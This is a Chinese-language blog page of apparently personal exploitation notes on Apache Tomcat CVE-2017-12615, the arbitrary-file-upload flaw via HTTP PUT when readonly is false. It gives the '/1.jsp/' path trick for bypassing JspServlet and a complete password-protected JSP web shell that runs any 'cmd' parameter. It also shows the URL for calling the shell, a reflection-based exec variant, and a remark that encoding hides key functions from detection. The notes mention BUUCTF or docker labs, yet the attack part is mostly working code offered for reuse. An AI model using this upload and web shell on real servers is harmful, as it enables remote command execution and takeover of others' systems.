<!DOCTYPE html>
<html lang=en>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="1 2017-12615 PUT任意文件上传-RCEtomcat通过PUT方法任意文件写入(CVE-2017-12615)漏洞复现 - Junglezt - 博客园 Tomcat 远程代码执行漏洞分析（CVE-2017-12615）及补丁 Bypass 绕过的代码审计，不清晰 Tomcat中如果在配置文件中设置了readonly&#x3D;false,就会产生任意文件上传漏洞。可以通过put请求方法上传任意">
<meta property="og:type" content="article">
<meta property="og:title" content="Tomcat漏洞利用">
<meta property="og:url" content="http://example.com/2025/05/26/Tomcat%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="1 2017-12615 PUT任意文件上传-RCEtomcat通过PUT方法任意文件写入(CVE-2017-12615)漏洞复现 - Junglezt - 博客园 Tomcat 远程代码执行漏洞分析（CVE-2017-12615）及补丁 Bypass 绕过的代码审计，不清晰 Tomcat中如果在配置文件中设置了readonly&#x3D;false,就会产生任意文件上传漏洞。可以通过put请求方法上传任意">
<meta property="og:locale" content="en_US">
<meta property="article:published_time" content="2025-05-26T06:58:07.000Z">
<meta property="article:modified_time" content="2025-05-30T14:54:24.878Z">
<meta property="article:author" content="John Doe">
<meta name="twitter:card" content="summary">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>Tomcat漏洞利用</title>
    <!-- async scripts -->
    <!-- Google Analytics -->


    <!-- Umami Analytics -->


    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
	<!-- mathjax -->
	
<meta name="generator" content="Hexo 7.3.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="Top" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fa-solid fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     --><!--
       --><li><a target="_blank" rel="noopener" href="http://github.com/probberechts">Projects</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" aria-label="Previous post" href="/2025/06/18/Linux%E6%8F%90%E6%9D%83%E6%80%BB%E7%BB%93/"><i class="fa-solid fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" aria-label="Next post" href="/2025/05/25/SSRF%E6%9C%8D%E5%8A%A1%E7%AB%AF%E8%AF%B7%E6%B1%82%E4%BC%AA%E9%80%A0-%E6%A9%99%E5%AD%90%E7%A7%91%E6%8A%80/"><i class="fa-solid fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="Back to top" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="Share post" href="#"><i class="fa-solid fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://example.com/2025/05/26/Tomcat%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://example.com/2025/05/26/Tomcat%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/&text=Tomcat漏洞利用"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://example.com/2025/05/26/Tomcat%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/&title=Tomcat漏洞利用"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://example.com/2025/05/26/Tomcat%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/&is_video=false&description=Tomcat漏洞利用"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=Tomcat漏洞利用&body=Check out this article: http://example.com/2025/05/26/Tomcat%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/"><i class="fa-solid fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://example.com/2025/05/26/Tomcat%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/&title=Tomcat漏洞利用"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://example.com/2025/05/26/Tomcat%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/&title=Tomcat漏洞利用"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://example.com/2025/05/26/Tomcat%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/&title=Tomcat漏洞利用"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://example.com/2025/05/26/Tomcat%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/&title=Tomcat漏洞利用"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://example.com/2025/05/26/Tomcat%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/&name=Tomcat漏洞利用&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://example.com/2025/05/26/Tomcat%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/&t=Tomcat漏洞利用"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    
    
      <div id="toc">
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#2017-12615-PUT%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0-RCE"><span class="toc-number">1.</span> <span class="toc-text">2017-12615 PUT任意文件上传-RCE</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%B1%BB%E5%8A%A0%E8%BD%BD%EF%BC%88%E5%86%B0%E8%9D%8E%E9%A9%AC%E5%AE%9E%E7%8E%B0%E6%96%B9%E5%BC%8F%EF%BC%89"><span class="toc-number">2.</span> <span class="toc-text">类加载（冰蝎马实现方式）</span></a></li></ol>
      </div>
    
  </span>
</div>

    
    <div class="content index py4 ">
        
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle p-name" itemprop="name headline">
        Tomcat漏洞利用
    </h1>



    <div class="meta">
      <span class="author p-author h-card" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span class="p-name" itemprop="name">John Doe</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2025-05-26T06:58:07.000Z" class="dt-published" itemprop="datePublished">2025-05-26</time>
        
      
    </div>


      

      

    </div>
  </header>
  

  <div class="content e-content" itemprop="articleBody">
    <p>1</p>
<h2 id="2017-12615-PUT任意文件上传-RCE"><a href="#2017-12615-PUT任意文件上传-RCE" class="headerlink" title="2017-12615 PUT任意文件上传-RCE"></a>2017-12615 PUT任意文件上传-RCE</h2><p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/Junglezt/p/18123082">tomcat通过PUT方法任意文件写入(CVE-2017-12615)漏洞复现 - Junglezt - 博客园</a></p>
<p><a target="_blank" rel="noopener" href="https://mp.weixin.qq.com/s?__biz=MzU3ODAyMjg4OQ==&mid=2247483805&idx=1&sn=503a3e29165d57d3c20ced671761bb5e&poc_token=HHcRNGij26bHeIrLr3UTHQ8HqovbnQw1tB09g1dm">Tomcat 远程代码执行漏洞分析（CVE-2017-12615）及补丁 Bypass</a> 绕过的代码审计，不清晰</p>
<p>Tomcat中如果在配置文件中设置了<code>readonly=false</code>,就会产生任意文件上传漏洞。可以通过<code>put</code>请求方法上传任意文件，例如<code>jsp</code>后门</p>
<p>靶场：<a target="_blank" rel="noopener" href="https://buuoj.cn/challenges">BUUCTF在线评测</a>或docker搭建</p>
<p>直接将GET请求页面改为PUT，路径改为：&#x2F;1.jsp&#x2F;</p>
<p>请求的地址为想要写入的文件名，例如这里是<code>/1.jsp</code>，为什么要加入<code>/1.jsp/</code>呢？<br>是因为tomcat解析到后缀名为<code>jsp</code>或者<code>jspx</code>的时候会交给<code>JspServlet</code>，最后的<code>/</code>是因为文件名特性最后不支持<code>/</code>默认会去除就可以绕过<code>JspServlet</code>文件的解析</p>
<p>Payload：<a target="_blank" rel="noopener" href="https://juejin.cn/post/7105300421089951775">Java安全-Java Web后门学习 Jsp 一句话分析</a></p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">&lt;%</span><br><span class="line">    <span class="keyword">if</span> (<span class="string">&quot;ocean&quot;</span>.<span class="title function_">equals</span>(request.<span class="title function_">getParameter</span>(<span class="string">&quot;pwd&quot;</span>))) &#123;</span><br><span class="line">        java.<span class="property">io</span>.<span class="property">InputStream</span> <span class="keyword">in</span> = <span class="title class_">Runtime</span>.<span class="title function_">getRuntime</span>().<span class="title function_">exec</span>(request.<span class="title function_">getParameter</span>(<span class="string">&quot;cmd&quot;</span>)).<span class="title function_">getInputStream</span>();</span><br><span class="line">        int a = -<span class="number">1</span>;</span><br><span class="line">        byte[] b = <span class="keyword">new</span> byte[<span class="number">2048</span>];</span><br><span class="line">        out.<span class="title function_">print</span>(<span class="string">&quot;&lt;pre&gt;&quot;</span>);</span><br><span class="line">        <span class="keyword">while</span> ((a = <span class="keyword">in</span>.<span class="title function_">read</span>(b)) != -<span class="number">1</span>) &#123;</span><br><span class="line">            out.<span class="title function_">print</span>(<span class="keyword">new</span> <span class="title class_">String</span>(b));</span><br><span class="line">        &#125;</span><br><span class="line">        out.<span class="title function_">print</span>(<span class="string">&quot;&lt;/pre&gt;&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">%&gt;</span><br></pre></td></tr></table></figure>

<p>访问：IP&#x2F;2.jsp?pwd&#x3D;ocean&amp;cmd&#x3D;ls%20&#x2F;</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">Process</span> <span class="variable">method</span> <span class="operator">=</span> (Process) runtime.getMethod(<span class="string">&quot;exec&quot;</span>,String.class).invoke(runtime.getMethod(<span class="string">&quot;getRuntime&quot;</span>).invoke(<span class="literal">null</span>, <span class="keyword">new</span> <span class="title class_">Object</span>[]&#123;&#125;), request.getParameter(<span class="string">&quot;cmd&quot;</span>));</span><br></pre></td></tr></table></figure>

<p>非常经典的反射</p>
<p>没有直接使用调用方法的方式去构造后门，而是采用动态加载的方式，把所要调用的类与函数放到一个字符串的位置，然后利用变形来隐藏关键函数，这里用的是 base64，同理可以使用 hex 和 ascii 的编码绕过</p>
<h2 id="类加载（冰蝎马实现方式）"><a href="#类加载（冰蝎马实现方式）" class="headerlink" title="类加载（冰蝎马实现方式）"></a>类加载（冰蝎马实现方式）</h2>
  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
        
          <li><a href="/">Home</a></li>
        
          <li><a href="/about/">About</a></li>
        
          <li><a href="/archives/">Writing</a></li>
        
          <li><a target="_blank" rel="noopener" href="http://github.com/probberechts">Projects</a></li>
        
      </ul>
    </div>

    
    
      <div id="toc-footer" style="display: none">
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#2017-12615-PUT%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0-RCE"><span class="toc-number">1.</span> <span class="toc-text">2017-12615 PUT任意文件上传-RCE</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%B1%BB%E5%8A%A0%E8%BD%BD%EF%BC%88%E5%86%B0%E8%9D%8E%E9%A9%AC%E5%AE%9E%E7%8E%B0%E6%96%B9%E5%BC%8F%EF%BC%89"><span class="toc-number">2.</span> <span class="toc-text">类加载（冰蝎马实现方式）</span></a></li></ol>
      </div>
    

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://example.com/2025/05/26/Tomcat%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://example.com/2025/05/26/Tomcat%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/&text=Tomcat漏洞利用"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://example.com/2025/05/26/Tomcat%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/&title=Tomcat漏洞利用"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://example.com/2025/05/26/Tomcat%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/&is_video=false&description=Tomcat漏洞利用"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=Tomcat漏洞利用&body=Check out this article: http://example.com/2025/05/26/Tomcat%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/"><i class="fa-solid fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://example.com/2025/05/26/Tomcat%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/&title=Tomcat漏洞利用"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://example.com/2025/05/26/Tomcat%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/&title=Tomcat漏洞利用"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://example.com/2025/05/26/Tomcat%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/&title=Tomcat漏洞利用"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://example.com/2025/05/26/Tomcat%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/&title=Tomcat漏洞利用"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://example.com/2025/05/26/Tomcat%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/&name=Tomcat漏洞利用&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://example.com/2025/05/26/Tomcat%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/&t=Tomcat漏洞利用"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fa-solid fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        
          <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fa-solid fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fa-solid fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2016-2025
    John Doe
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     --><!--
       --><li><a target="_blank" rel="noopener" href="http://github.com/probberechts">Projects</a></li><!--
     -->
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->

  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script>




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script>
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="fa-regular fa-clone"></i>';
    btn += '</span>';
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Disqus Comments -->

<!-- utterances Comments -->

</body>
</html>
